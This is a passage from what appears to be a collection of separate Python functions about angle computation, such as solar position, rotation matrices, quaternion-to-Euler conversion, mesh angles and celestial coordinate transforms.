surface_azimuth, B, GB\n result = np.vectorize(calc_categoriesroof)(sensors_metadata_clean.surface_azimuth, sensors_metadata_clean.B,\n sensors_metadata_clean.total_rad_Whm2, Max_Isol)\n sensors_metadata_clean['CATteta_z'] = result[0]\n sensors_metadata_clean['CATB'] = result[1]\n sensors_metadata_clean['CATGB'] = result[2]\n return sensors_metadata_clean", "def calc_incidence_angle():\n \n Delta_r, lat_r, Omega_r, Zenith_r, Azimuth_r, Elev_angle = solar_model()\n \n # Beta is equal to angle of tilted surface to horizontal (in radians)\n roof_slopes_west = section_coordinates()\n Beta_r = np.arctan(roof_slopes_west) \n incidence_angles_west = np.zeros(101)\n \n \n for i in range(0,len(roof_slopes_west)):\n incidence_angles_west[i] = np.arccos(np.sin(Delta_r)* np.sin(lat_r) * np.cos(Beta_r[i]) - np.sin(Delta_r) * np.cos(lat_r) * np.sin(Beta_r[i]) * np.cos(Azimuth_r) + np.cos(Delta_r) * np.cos(lat_r) * np.cos(Beta_r[i]) * np.cos(Omega_r) + np.cos(Delta_r) * np.sin(lat_r) * np.sin(Beta_r[i]) * np.cos(Azimuth_r) * np.cos(Omega_r) + np.cos(Delta_r) * np.sin(Beta_r[i]) * np.sin(Azimuth_r) * np.sin(Omega_r))", "def angle_difference(self):\n inigen = IniGen()\n fields = algorithm_fields.algorithms['angle_difference']\n\n output_uuid_map = {}\n\n # set up global parameters\n algorithm_path = fields['path']\n enabled = \"True\"\n inigen.emit_global(algorithm_path, enabled)\n\n for label in self.uuid_map:\n if label == 'LSTATE' or 'MAG' in label:\n continue\n distillate_label = get_distillate_label([label])\n\n # header\n inigen.emit_run_header(label, CHUNKING, MINTIME, MAXTIME)\n\n # body\n dep_ref_label = \"{0} {1}\".format(label, self.ref_name)\n dep_ref_name = fields['deps'][0]\n dep_ref_uuid = self.reference_uuid_map[label]\n dep_label = \"{0} {1}\".format(label, self.name)\n dep_name = fields['deps'][1]\n dep_uuid = self.uuid_map[label]\n deps = [[dep_ref_label, dep_ref_name, dep_ref_uuid], [dep_label, dep_name, dep_uuid]]\n\n param_section_name = fields['params'][0]\n param_section_value = \"Production/{0}/{1}/{2}/{3}\".format(self.location, self.ref_name, self.name, distillate_label)\n param_name_name = fields['params'][1]\n param_name_value = \"ANGLE-DIFF\"\n params = [[param_section_name, param_section_value], [param_name_name, param_name_value]]\n\n outputs = fields['outputs']\n\n emitted = inigen.emit_run_body(deps, params, outputs)\n\n output_uuid_map[label] = emitted[-2][-36:]\n\n filename = \"{0}/ANG-DIFF_{1}.ini\".format(self.dirname, self.name)\n inigen.generate_file(filename)\n return output_uuid_map", "def read_image_and_angle(root_path, data, camera, index):\n image_path = os.path.join(root_path,\n data[cameras[camera]].values[index].strip())\n image = plt.image.imread(image_path)\n angle = data.steering.values[index] + cameras_correction[camera]\n\n return image, angle", "def parse_elevations_response(elevations_response):\n return [result[\"elevation\"] for result in elevations_response]", "def test_rotation_angle(self):\n\n self.test_shape.azimuth_placement_angle = [45, 135, 225, 315]\n test_volume = self.test_shape.volume()\n self.test_shape.rotation_angle = 180\n assert self.test_shape.volume() == pytest.approx(test_volume * 0.5)", "def align_z_along_fixed_ends(xyz_file_parts, fixed_beginning, fixed_end):\n\n\t\tmolecule_axis = [xyz_file_parts[-1][1,fixed_end],xyz_file_parts[-1][2,fixed_end],xyz_file_parts[-1][3,fixed_end]]\n\n\n\t\tangle = np.arccos(molecule_axis[2]/np.linalg.norm(molecule_axis))\n\t\ttheta = angle\n\n\t\tif(angle != 0):\n\t\t\t#calculate rotation axis\n\t\t\trotation_axis = np.cross(molecule_axis, [0.0,0.0,1.0])\n\t\t\trotation_axis = 1.0/np.linalg.norm(rotation_axis)*rotation_axis\n\t\t\tu = rotation_axis\n\n\t\t\t#calculate rotation_matrix\n\t\t\trotation_matrix = [[np.cos(theta) + u[0]**2 * (1-np.cos(theta)), u[0] * u[1] * (1-np.cos(theta)) - u[2] * np.sin(theta), u[0] * u[2] * (1 - np.cos(theta)) + u[1] * np.sin(theta)],\n\t [u[0] * u[1] * (1-np.cos(theta)) + u[2] * np.sin(theta), np.cos(theta) + u[1]**2 * (1-np.cos(theta)), u[1] * u[2] * (1 - np.cos(theta)) - u[0] * np.sin(theta)],\n\t [u[0] * u[2] * (1-np.cos(theta)) - u[1] * np.sin(theta), u[1] * u[2] * (1-np.cos(theta)) + u[0] * np.sin(theta), np.cos(theta) + u[2]**2 * (1-np.cos(theta))]]\n\n\t\t\tfor j in range(0, len(xyz_file_parts)):\n\t\t\t\tfor i in range(0, len(xyz_file_parts[j][1,:])):\n\t\t\t\t\t \n\t\t\t\t\tvector_to_rotate = [round(float(xyz_file_parts[j][1,i]),5),round(float(xyz_file_parts[j][2,i]),5),round(float(xyz_file_parts[j][3,i]),5)]\n\t\t\t\t\trotated_vector = np.asmatrix(rotation_matrix)*np.asmatrix(vector_to_rotate).T\n\t\t\t\t\txyz_file_parts[j][1,i] = round(rotated_vector[0,0],5)\n\t\t\t\t\txyz_file_parts[j][2,i] = round(rotated_vector[1,0],5)\n\t\t\t\t\txyz_file_parts[j][3,i] = round(rotated_vector[2,0],5)\n\t\t\treturn xyz_file_parts\n\t\telse:\n\t\t\treturn xyz_file_parts", "def test_calc_rotation(self):\n t = AioBaseTurtle()\n t.speed(speed=2)\n orient, steps, delta = t._calc_rotation(120)\n self.assertEqual(steps, 21)\n self.assertAlmostEqual(delta, 120.0 / 21.0)\n self.assertAlmostEqual(orient[0], math.cos(math.radians(120)))\n self.assertAlmostEqual(orient[1], math.sin(math.radians(120)))", "def load_hrpsys_log_astate(astate_path, angle_unit=\"deg\"):\n\n astate = np.loadtxt(astate_path, comments=\"%\")\n if astate.shape[1] != 176:\n sys.exit([astate_path, \" is not a valid \" \"*-astate.log\" \" file\"])\n\n m = astate.shape[0]\n dt = \"f4\"\n a = np.zeros(\n m,\n dtype=[\n (\"enc\", dt, 40),\n (\"torque\", dt, 40),\n (\"ss\", dt, 40),\n (\"forceRL\", dt, 6),\n (\"forceLL\", dt, 6),\n (\"forceRA\", dt, 6),\n (\"forceLA\", dt, 6),\n (\"acc\", dt, 6),\n (\"gyro\", dt, 3),\n (\"qrot\", dt, 9),\n (\"waist_p\", dt, 3),\n (\"waist_rot\", dt, 9),\n (\"time\", dt, 1),\n (\"controltimev2\", dt, 1),\n (\"type\", \"a6\"),\n (\"ang_type\", \"a3\"),\n ],\n )\n a[\"enc\"] = astate[:, 0:40]\n # JA0-JA39\n a[\"torque\"] = astate[:, 40:80]\n # TQ0-TQ39\n a[\"ss\"] = astate[:, 80:120]\n # SS0-SS39\n a[\"forceRL\"] = astate[:, 120:126]\n # FX0-MZ0\n a[\"forceLL\"] = astate[:, 126:132]\n # FX1-MZ1\n a[\"forceRA\"] = astate[:, 132:138]\n # FX2-MZ2\n a[\"forceLA\"] = astate[:, 138:144]\n # FX3-MZ3\n a[\"acc\"] = astate[:, 144:150]\n # AX0,AY0,AZ0,AX1,AY1,AZ1\n a[\"gyro\"] = astate[:, 150:153]\n # WX0,WY0,WZ0\n a[\"qrot\"] = astate[:, 153:162]\n # QX0,QY0,QZ0,QW0 (rot matrix)\n a[\"waist_p\"] = astate[:, 162:165]\n # waistPX-waistPZ\n a[\"waist_rot\"] = astate[:, 165:174]\n # waistQX-waistQW (rot matrix)\n a[\"time\"] = astate[:, 174]\n # clockv2\n a[\"controltimev2\"] = astate[:, 175]\n # ControlTimeV2\n\n a[\"type\"] = \"astate\"\n a[\"ang_type\"] = \"rad\"\n\n if angle_unit == \"deg\":\n a[\"enc\"] = 180 / np.pi * a[\"enc\"]\n # Joint angles in degrees\n a[\"ang_type\"] = \"deg\"\n print(\"Warning: enc angles (astate) in degrees!\")\n\n return a", "def Angles(self, degrees=True):\n\n self.__do_essential_memebers_exist__()\n if self.InferElementalDimension() != 2:\n raise ValueError(\"Angles can be computed only for 2D elements\")\n if self.InferSpatialDimension() != 2:\n raise ValueError(\"Angles can be computed only in 2-dimensional plane\")\n\n nodeperelem = self.InferNumberOfNodesPerLinearElement()\n angles = np.zeros((self.nelem, nodeperelem))\n\n norm = lambda x: np.linalg.norm(x,axis=1)\n\n edge_coords = self.points[self.elements[:,:],:]\n if self.element_type == \"tri\":\n AB = edge_coords[:,1,:] - edge_coords[:,0,:]\n AC = edge_coords[:,2,:] - edge_coords[:,0,:]\n BC = edge_coords[:,2,:] - edge_coords[:,1,:]\n\n angles[:,0] = np.einsum(\"ij,ij->i\",AB,AC) / (norm(AB)*norm(AC))\n angles[:,1] = np.einsum(\"ij,ij->i\",AC,BC) / (norm(AC)*norm(BC))\n angles[:,2] = np.einsum(\"ij,ij->i\",BC,-AB)/ (norm(BC)*norm(AB))\n angles = np.arccos(angles)\n\n elif self.element_type == \"quad\":\n AB = edge_coords[:,1,:] - edge_coords[:,0,:]\n BC = edge_coords[:,2,:] - edge_coords[:,1,:]\n CD = edge_coords[:,3,:] - edge_coords[:,2,:]\n DA = edge_coords[:,0,:] - edge_coords[:,3,:]\n\n angles[:,0] = np.einsum(\"ij,ij->i\",AB,BC) / (norm(AB)*norm(BC))\n angles[:,1] = np.einsum(\"ij,ij->i\",BC,CD) / (norm(BC)*norm(CD))\n angles[:,2] = np.einsum(\"ij,ij->i\",CD,DA) / (norm(CD)*norm(DA))\n angles[:,3] = np.einsum(\"ij,ij->i\",DA,-AB)/ (norm(DA)*norm(AB))\n angles = np.arccos(angles)\n\n if degrees:\n angles *= 180/np.pi\n\n return angles", "def convert_coords(date, time_steps, azs, els, obs):\n coord_start_day = datetime(date.year, date.month, date.day)\n \n strategy = []\n for time_step, az, el in zip(time_steps, azs, els):\n if az % np.pi == 0.0: \n az += EPS\n \n ra, dec = sphere.altaz_to_ra_dec(coord_start_day + timedelta(hours=time_step), az, el, obs)\n strategy.append([ra, dec])\n \n return np.array(strategy)", "def solar_angles(df, lat, lon, alt=0):\n\n jd = pd.Timestamp(df).to_julian_date()\n\n # offset (2451543.5)\n d_offset = pd.Timestamp('1999-12-31 00:00:00').to_julian_date()\n\n d = jd - d_offset\n\n\n # Keplerian elements for the sun (geocentric)\n w = 282.9404 + 4.70935E-5 * d # longitude of perihelion [degrees]\n a = 1.0 # mean distance [AU]\n e = 0.016709 - 1.151E-9 * d # eccentricity [-]\n M = np.mod(356.0470 + 0.9856002585 * d, 360.0) # mean anomaly [degrees]\n L = w + M # Sun's mean longitude [degrees]\n oblecl = 23.4393 - 3.563E-7 * d # Sun's obliquity of the eliptic [degrees]\n\n # Auxiliary angle [degrees]\n E = M + (180.0 / np.pi) * e * np.sin(np.deg2rad(M)) * (1.0 + e * np.cos(np.deg2rad(M)))\n\n # Rectangular coordinates in the plane of the ecliptic (x-axis toward perihelion)\n x = np.cos(np.deg2rad(E)) - e\n y = np.sin(np.deg2rad(E)) * np.sqrt(1 - (e ** 2))\n\n # Distance (r) and true anomaly (v)\n r = np.sqrt((x ** 2) + (y ** 2))\n v = np.rad2deg(np.arctan2(y, x))\n\n # Longitude of the sun\n lon_sun = v + w\n\n # Ecliptic rectangular coordinates\n xeclip = r * np.cos(np.deg2rad(lon_sun))\n yeclip = r * np.sin(np.deg2rad(lon_sun))\n zeclip = 0.0\n\n # Rotate coordinates to equatorial rectangular coordinates\n xequat = xeclip\n yequat = yeclip * np.cos(np.deg2rad(oblecl)) + zeclip * np.sin(np.deg2rad(oblecl))\n zequat = yeclip * np.sin(np.deg2rad(23.4406)) + zeclip * np.cos(np.deg2rad(oblecl))\n\n # Convert equatorial rectangular coordinates to right-ascension (RA) and declination\n r = np.sqrt(xequat ** 2 + yequat ** 2 + zequat ** 2) - (alt / 149598000.0)\n RA = np.rad2deg(np.arctan2(yequat, xequat))\n delta = np.rad2deg(np.arcsin(zequat / r))\n\n # Calculate local siderial time\n uth = df.hour + (df.minute / 60.0) + (df.second / 3600.0)\n gmst0 = np.mod(L + 180.0, 360.0) / 15.0\n sidtime = gmst0 + uth + (lon / 15.0)\n\n # Replace RA with hour-angle (HA)\n HA = sidtime * 15.0 - RA\n\n # Convert to rectangular coordinates\n x = np.cos(np.deg2rad(HA)) * np.cos(np.deg2rad(delta))\n y = np.sin(np.deg2rad(HA)) * np.cos(np.deg2rad(delta))\n z = np.sin(np.deg2rad(delta))\n\n # Rotate along an axis going East-West\n xhor = x * np.cos(np.deg2rad(90.0 - lat)) - z * np.sin(np.deg2rad(90.0 - lat))\n yhor = y\n zhor = x * np.sin(np.deg2rad(90.0 - lat)) + z * np.cos(np.deg2rad(90.0 - lat))\n\n # Find azimuthal and elevation angles\n azimuthal = np.rad2deg(np.arctan2(yhor, xhor)) + 180.0\n elevation = np.rad2deg(np.arcsin(zhor))\n\n zenith = 90.0 - elevation\n\n return np.column_stack((zenith, elevation, azimuthal))", "def angles(self):\n penult = self._coordinates[-2]\n last = self._coordinates[-1]\n angles = []\n for c in self._coordinates:\n angle = (math.atan2(penult[0]-last[0], penult[1]-last[1]) -\n math.atan2(c[0]-last[0], c[1]-last[1]))\n angles.append(angle)\n penult, last = last, c\n return sorted(angles)", "def magnitude_orientation(gx, gy):\n \n magnitude = np.sqrt(gx**2 + gy**2)\n orientation = (np.arctan2(gy, gx) * 180 / np.pi) % 180\n \n return magnitude, orientation", "def merdianArcLength(**kwargs):\n a = 0\n b = 0\n kwargs[\"radius\"] = \"M\"\n try:\n if kwargs[\"ref\"] == \"local\":\n a = 6378249.145\n b = 6356515\n elif kwargs[\"ref\"] == \"global\":\n a = 6378137\n b = 6356752.314\n elif kwargs[\"a\"] and kwargs[\"b\"]:\n a = kwargs[\"a\"]\n b = kwargs[\"b\"]\n except KeyError:\n return {\"erreur\": \"params a and b is required, you can use ref too which has two possible value: local and global\"}\n try:\n kwargs[\"phi\"] = kwargs[\"phi1\"]\n M1 = rayonDeCourbur(**kwargs)[\"M\"]\n kwargs[\"phi\"] = kwargs[\"phi2\"]\n M2 = rayonDeCourbur(**kwargs)[\"M\"]\n deltaPhi = abs(kwargs[\"phi2\"]-kwargs[\"phi1\"])\n if 2 <= deltaPhi < 5:\n e2 = 1-(b/a)**2\n Mm = (M1+M2)/2\n phiM = (kwargs[\"phi1\"]+kwargs[\"phi2\"])/2\n S = ((M1+M2+4*Mm)*deltaPhi +\n ((math.cos(math.radians(2*phiM))*deltaPhi**5)*(a*e2)/240))/6\n return {\"S\": S}\n elif deltaPhi < 2:\n e2 = 1-(b/a)**2\n Mm = (M1+M2)/2\n phiM = (kwargs[\"phi1\"]+kwargs[\"phi2\"])/2\n S = Mm*deltaPhi+(a*e2*math.cos(2*phiM)*deltaPhi**3)/3\n return {\"S\": S}\n except KeyError:\n return {\"error\": \"the function required 3 basics params phi1,phi2 and ref or a&b\"}", "def light_dir_from_angles(theta, phi, source_tilt):\n theta += source_tilt[0]\n phi += source_tilt[1]\n rho = 1\n phi_rad = np.radians(-phi)\n theta_rad = np.radians(theta)\n x = np.sin(phi_rad)*np.cos(theta_rad)*rho\n y = np.sin(phi_rad)*np.sin(theta_rad)*rho\n z = rho*np.cos(phi_rad)\n return x, y, z", "def get_angle(RgmNet, Nodeid):\n # angle = []\n angle = {}\n para = RgmNet.get_motion_para(Nodeid)\n for i in range(len(Nodeid)):\n temp_para = para[str(Nodeid[i])]\n angle.update({str(Nodeid[i]): temp_para[0]})\n # angle.append(temp_para[0])\n print(\"the angle of id %d is %f\" % (Nodeid[i], temp_para[0]))\n return angle", "def get_angle(RgmNet, Nodeid):\n # angle = []\n angle = {}\n para = RgmNet.get_motion_para(Nodeid)\n for i in range(len(Nodeid)):\n temp_para = para[str(Nodeid[i])]\n angle.update({str(Nodeid[i]): temp_para[0]})\n # angle.append(temp_para[0])\n print(\"the angle of id %d is %f\" % (Nodeid[i], temp_para[0]))\n return angle", "def get_shot_angles(self, shot_loc):\n return (self.trajectory_algo.calc_yaw(shot_loc), self.trajectory_algo.calc_pitch(shot_loc))", "def test_extract_rot_angle():\n v = np.zeros((4,2))\n try:\n angle = extract_rot_angle(v,min_points=0)\n except AssertionError,err:\n assert err.args[0]==\"Zero velocities not allowed.\"\n \n v[:,1] = 1.\n try:\n angle = extract_rot_angle(v,min_points=0)\n except AssertionError,err:\n assert err.args[0]==\"Failed to get both forward and backward directions.\"\n\n # Forwards-backwards motion.\n v[:,1] = 0.\n v[:2,0] = -1.1\n v[2:,0] = 1.2\n angle = extract_rot_angle(v,min_points=0)\n assert np.isclose(angle,np.pi)\n\n # Forwards-backwards motion.\n v[:,0] = 0.\n v[:2,1] = -.9\n v[2:,1] = .8\n angle = extract_rot_angle(v,min_points=0)\n assert np.isclose(angle,-np.pi/2)\n\n # Forwards-backwards motion with noise.\n v[:2,1] += (np.random.rand(2)*2-1)/10\n v[2:,1] += (np.random.rand(2)*2-1)/10\n angle = extract_rot_angle(v,min_points=0)\n assert np.isclose(angle,-np.pi/2,atol=.1)", "def rotation_angle_to_object(object_info, point):\n object_coords = object_info['axisAlignedBoundingBox']['center'] if 'axisAlignedBoundingBox' in object_info else \\\n object_info['position']\n\n x_delta = object_coords['x'] - point['x']\n z_delta = object_coords['z'] - point['z']\n r = np.sqrt(np.square(x_delta) + np.square(z_delta))\n\n angle = np.arctan2(x_delta / r, z_delta / r) * 180 / np.pi\n\n if angle < 0:\n angle += 360\n if angle > 360.0:\n angle -= 360.0\n return angle", "def steps_to_angle():\n pass", "def getBalanceAngles():\n\n balance_angles = RoboCaller().call(\"getBalanceAngles\", \"int\")\n for i in range(len(balance_angles)):\n balance_angles[i] = (balance_angles[i] + 2**15) % 2**16 - 2**15\n return balance_angles", "def azel2radec(az,el,mjd,lat=47.8781,lon=-87.6298):\n \n T_UT1 = (mjd-51544.5)/36525;\n ThetaGMST = 67310.54841 + (876600*3600 + 8640184.812866)*T_UT1 + \\\n .093104*(T_UT1**2) - (6.2e-6)*(T_UT1**3)\n ThetaGMST = np.mod((np.mod(ThetaGMST,86400*(ThetaGMST/np.abs(ThetaGMST)))/240),360)\n ThetaLST = ThetaGMST + lon\n \n DEC = asind(sind(el)*sind(lat)+cosd(el)*cosd(lat)*cosd(az))\n LHA = atand2(-sind(az)*cosd(el)/cosd(DEC), \n (sind(el)-sind(DEC)*sind(lat))/(cosd(DEC)*cosd(lat)))*(180/np.pi);\n RA = np.mod(ThetaLST-LHA,360);\n \n return RA,DEC", "def euler_angles(quatX,quatY,quatZ,quatW):\n\n\troll1 = 2.0 * (quatW * quatX + quatY * quatZ)\n\troll2 = (1.0 - 2.0) * (quatX * quatX + quatY * quatY)\n\n\tyaw1 = 2.0 * (quatW * quatZ + quatX * quatY)\n\tyaw2 = 1.0 - 2.0 * (quatY * quatY + quatZ * quatZ)\n\n\troll = math.atan2(roll1,roll2)\n\tpitch = math.asin(max(-1.0, min(1.0, 2.0 *(quatW * quatY - quatZ * quatX))))\n\tyaw = math.atan2(yaw1,yaw2)\n\n\troll_w = int(((roll + (math.pi)) / (math.pi * 2.0) * 18))\n\tpitch_w = int(pitch + (math.pi/2.0)/math.pi * 18)\n\tyaw_w = int(yaw + (math.pi / (math.pi * 2.0)) * 18)\n\n\teulerAngles = [roll_w,pitch_w,yaw_w]\n\treturn eulerAngles", "def extractRotate(self,groups):\n self.rotate = math.pi * float(groups[0]) / 180\n self.rX = 0\n self.rY = 0\n if len(groups) == 3:\n if groups[1]:\n \tself.rX = float(groups[1])\n if groups[2]:\n \tself.rY = float(groups[2])\n\n #alpha = float(self.rotate)\n alpha = self.rotate\n cx = self.rX\n cy = self.rY\n self.matrix = [ [\n math.cos(alpha),\n -math.sin(alpha),\n -cx * math.cos(alpha) + cy * math.sin(alpha) + cx\n ],\n [\n math.sin(alpha),\n math.cos(alpha),\n -cx * math.sin(alpha) - cy * math.cos(alpha) + cy\n ]\n ]", "def get_inplane_angle(ima,ref, iring=1, fring=-1, ringstep=1, xtransSearch=0, ytransSearch=0, stp=1, center=1):\n\n\tfrom alignment import Numrinit, ringwe, Applyws, ormq\n\tfrom filter import fshift\n\n\tfirst_ring=int(iring); last_ring=int(fring); rstep=int(ringstep); xrng=int(xtransSearch); yrng=int(ytransSearch); step=int(stp)\t\n\tnx=ima.get_xsize()\n\tif(last_ring == -1): last_ring=int(nx/2)-2\n\tcnx = int(nx/2)+1\n \tcny = cnx\n \tmode = \"F\"\n \t#precalculate rings\n\tnumr = Numrinit(first_ring, last_ring, rstep, mode)\n \twr = ringwe(numr, mode)\n\tif(center==1):\n\t\tcs = [0.0]*2 # additio\n\t\tcs = ref.phase_cog()\n\t\tref1 = fshift(ref, -cs[0], -cs[1])\n\t\tcimage=Util.Polar2Dm(ref1, cnx, cny, numr, mode)\n\t\tcs = ima.phase_cog()\n\t\tima1 = fshift(ima, -cs[0], -cs[1])\n\telse:\n\t\tima1=ima.copy()\n\t\tcimage=Util.Polar2Dm(ref, cnx, cny, numr, mode)\n\tUtil.Frngs(cimage, numr)\n\tApplyws(cimage, numr, wr)\n\t[angt, sxst, syst, mirrort, peakt]=ormq(ima1, cimage, xrng, yrng, step, mode, numr, cnx, cny)\n\treturn angt,sxst, syst, mirrort, peakt", "def parse_angle(keyword_args, lineno=None):\n\n ret = []\n name = keyword_args['name']\n angle = obj_dict['angle'].get(name)\n\n #if angle is not None:\n # return [angle, angle.p1, angle.p2, angle.p3]\n if angle is None:\n angle = primitives.Angle(name)\n obj_dict['angle'][name] = angle\n if name and not (keyword_args.get(\"p1\") or keyword_args.get(\"p2\") or keyword_args.get(\"p3\")):\n p1 = obj_dict['point'].get(name[0])\n if p1 is None:\n p1 = primitives.Point(name[0])\n obj_dict['point'][name[0]] = p1\n p2 = obj_dict['point'].get(name[1])\n if p2 is None:\n p2 = primitives.Point(name[1])\n obj_dict['point'][name[1]] = p2\n p3 = obj_dict['point'].get(name[2])\n if p3 is None:\n p3 = primitives.Point(name[2])\n obj_dict['point'][name[2]] = p3\n\n else:\n p1 = keyword_args.get(\"p1\")\n if p1 is not None:\n p1 = obj_dict['point'].get(p1)\n if p1 is None:\n p1 = primitives.Point(keyword_args.get(\"p1\"))\n obj_dict['point'][keyword_args.get(\"p1\")] = p1\n p2 = keyword_args.get(\"p2\")\n if p2 is not None:\n p2 = obj_dict['point'].get(p2)\n if p2 is None:\n p2 = primitives.Point(keyword_args.get(\"p2\"))\n obj_dict['point'][keyword_args.get(\"p2\")] = p2\n p3 = keyword_args.get(\"p3\")\n if p3 is not None:\n p3 = obj_dict['point'].get(p3)\n if p3 is None:\n p3 = primitives.Point(keyword_args.get(\"p3\"))\n obj_dict['point'][keyword_args.get(\"p3\")] = p3\n\n big = keyword_args.get(\"big\")\n if big is not None:\n angle.big = big\n\n if (p1.x is not None and p2.x is not None and p3.x is not None):\n\n degree = get_degree(p1, p2, p3)\n\n if angle.big:\n if degree < 0:\n p4 = p1\n p1 = p3\n p3 = p4\n degree = 360 + degree\n else:\n degree = 360 - degree\n else:\n if degree > 0:\n p4 = p1\n p1 = p3\n p3 = p4\n else:\n degree = -1 * degree\n\n angle.degree = degree\n\n angle.p1 = p1\n angle.p2 = p2\n angle.p3 = p3\n ret.append(\"angle_\"+angle.name)\n ret.append(\"point_\"+p1.name)\n ret.append(\"point_\"+p2.name)\n ret.append(\"point_\"+p3.name)\n\n return ret", "def azimuth(source):\n srcAzEl = subarrayControl.s.azel(source, 0.0);\n return srcAzEl[0];", "def angles(self):\n\n return self._angles", "def find_angle(im_binary: np.ndarray) -> float:\n angles = np.linspace(-np.pi/2, np.pi/2, 360)\n h, theta, d = skimage.transform.hough_line(im_binary, theta=angles)\n _, angles, distances = skimage.transform.hough_line_peaks(\n h, theta, d, num_peaks=1)\n return angles, distances", "def read_data(self):\r\n\t\tdata0 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\tdata1 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\r\n\t\ttime.sleep(0.5)\r\n\t\t\r\n\t\t# Checking valid data\r\n\t\twhile (data0 == 0) and (data1 == 0) :\r\n\t\t\tdata0 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\tdata1 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\r\n\t\t# Convert the data to 12-bits\r\n\t\traw_adc = ((data0 & 0x0F) * 256.0) + data1\r\n\t\tangle = (raw_adc / 4096.0) * 360.0\r\n\t\t\r\n\t\treturn {'a' : angle}", "def get_angle_contrib(self, groupBy='m'):\n ias3 = []\n types3_z = []\n types3_m = []\n\n e3 = 0.0\n es3 = []\n for aj in self.m.GetAtoms():\n j = aj.GetIdx()\n zj = self.zs[j]\n neibs = aj.GetNeighbors()\n nneib = len(neibs)\n if zj > 1 and nneib > 1:\n for i0 in range(nneib):\n for k0 in range(i0+1,nneib):\n eijk = 0.0\n i, k = neibs[i0].GetIdx(), neibs[k0].GetIdx()\n ias = [i,j,k]\n ias3.append(ias)\n\n ap1, ap2, ap3 = [ self.atypes[ia] for ia in ias ]\n if ap1 > ap3:\n tv = ap1; ap1 = ap3; ap3 = tv # tv: temperay value\n types3_m.append( '-'.join( [ap1, ap2, ap3] ) )\n\n z1, z2, z3 = [ self.zs[ia] for ia in ias ]\n if z1 > z3:\n tv = z1; z1 = z3; z3 = tv\n types3_z.append( '-'.join(['%d'%zi for zi in [z1,z2,z3] ]) )\n\n theta = rdMolTransforms.GetAngleRad(self.m.GetConformer(), i, j, k)\n cosT = np.cos(theta)\n ka, theta0 = rcr.GetUFFAngleBendParams(self.m, i, j, k)\n theta0 = theta0*np.pi/180.0\n cosT0 = np.cos(theta0); sinT0 = np.sin(theta0)\n\n #print ' -- atypes = ', self.atypes\n hybj = self.hybs[j]\n if hybj == 'SP':\n eijk = ka*(1.0 + np.cos(theta))\n elif hybj == 'SP2':\n # energy expression from Openbabel's src file \"forcefielduff.cpp',\n # different from that of Rappe's bad formula,\n eijk = (ka/4.5)*(1.0 + (1.0 + cosT)*(4.0*cosT))\n elif hybj == 'SP3':\n c2 = 1.0 / (4.0 * sinT0 * sinT0)\n c1 = -4.0 * c2 * cosT0;\n c0 = c2*(2.0*cosT0*cosT0 + 1.0);\n eijk = ka*(c0 + c1*cosT + c2*(2.0*cosT*cosT - 1.0))\n else:\n print('not supported atomic type: %s'%apj)\n assert 0\n\n e3 += eijk\n es3.append(eijk)\n self.e3 = e3\n self.es3 = es3\n self.n3 = len(es3)\n self.types3 = {'m':types3_m, 'n':types3_z}[groupBy]\n #return e3, n3, types3, es3", "def direction_coordinates(self, gc_lines):\n lins = [(_line[0][mid], _line[0][mid + 1], _line[1][mid], _line[1][mid + 1])\n for _line, mid in zip(gc_lines, [len(_line[0]) // 2 for _line in gc_lines])\n if len(_line[0]) > 2]\n lens = [np.hypot(_line[0][0] - _line[0][-1], _line[0][0] - _line[0][-1]) * 110.\n for _line in gc_lines\n if len(_line[0]) > 2]\n lins = [(x0 * np.cos(np.deg2rad(np.mean([y0, y1]))), x1 * np.cos(np.deg2rad(np.mean([y0, y1]))), y0, y1)\n for x0, x1, y0, y1 in lins]\n lins = [_x for _x, _l in zip(lins, lens) if _l > 10]\n\n direction = [(0.5 * (x0 + x1), 0.5 * (y0 + y1), x1 - x0, y1 - y0) for x0, x1, y0, y1 in lins]\n direction = [(_u, _v, _x / np.hypot(_x, _y), _y / np.hypot(_x, _y))\n for _u, _v, _x, _y in direction]\n los = [rotate_point(point[2:], -self.dsbObsAngleAzimuth.value()) for point in direction]\n\n dist = 1.\n tp_dir = (np.array(los).T * dist).T\n\n tps = [(x0, y0, x0 + tp_x, y0 + tp_y) for\n ((x0, y0, _, _), (tp_x, tp_y)) in zip(direction, tp_dir)]\n tps = [[(x0 / np.cos(np.deg2rad(y0)), y0), (x1 / np.cos(np.deg2rad(y0)), y1)] for (x0, y0, x1, y1) in tps]\n return tps", "def _calc_azel(cache, name, ant):\n real_sensor = '%s_pos_actual_scan_%s' % \\\n (ant, 'azim' if name.endswith('az') else 'elev')\n cache[name] = sensor_data = katpoint.deg2rad(cache.get(real_sensor))\n return sensor_data", "def _determine_extra_angles(self, angle_force, reference_topology, growth_indices):\n from simtk import openmm\n import itertools\n from openeye import oechem, oeomega\n\n if len(growth_indices)==0:\n return\n angle_force_constant = 400.0*unit.kilojoules_per_mole/unit.radians**2\n atoms = list(reference_topology.atoms())\n growth_indices = list(growth_indices)\n #get residue from first atom\n residue = atoms[growth_indices[0].idx].residue\n try:\n oemol = FFAllAngleGeometryEngine._oemol_from_residue(residue)\n except Exception as e:\n print(\"Could not generate an oemol from the residue.\")\n print(e)\n\n #get the omega geometry of the molecule:\n\n omega = oeomega.OEOmega()\n omega.SetMaxConfs(1)\n omega.SetStrictStereo(False) #TODO: fix stereochem\n omega(oemol)\n\n #we now have the residue as an oemol. Time to find the relevant angles.\n #There's no equivalent to OEGetTorsions, so first find atoms that are relevant\n #TODO: find out if that's really true\n aromatic_pred = oechem.OEIsAromaticAtom()\n heavy_pred = oechem.OEIsHeavy()\n angle_criteria = oechem.OEAndAtom(aromatic_pred, heavy_pred)\n\n #get all heavy aromatic atoms:\n #TODO: do this more efficiently\n heavy_aromatics = list(oemol.GetAtoms(angle_criteria))\n for atom in heavy_aromatics:\n #bonded_atoms = [bonded_atom for bonded_atom in list(atom.GetAtoms()) if bonded_atom in heavy_aromatics]\n bonded_atoms = list(atom.GetAtoms())\n for angle_atoms in itertools.combinations(bonded_atoms, 2):\n angle = oechem.OEGetAngle(oemol, angle_atoms[0], atom, angle_atoms[1])\n atom_indices = [angle_atoms[0].GetData(\"topology_index\"), atom.GetData(\"topology_index\"), angle_atoms[1].GetData(\"topology_index\")]\n angle_radians = angle*unit.radian\n growth_idx = self._calculate_growth_idx(atom_indices, growth_indices)\n #If this is a CustomAngleForce, we need to pass the parameters as a list, and it will have the growth_idx parameter.\n #If it's a regular 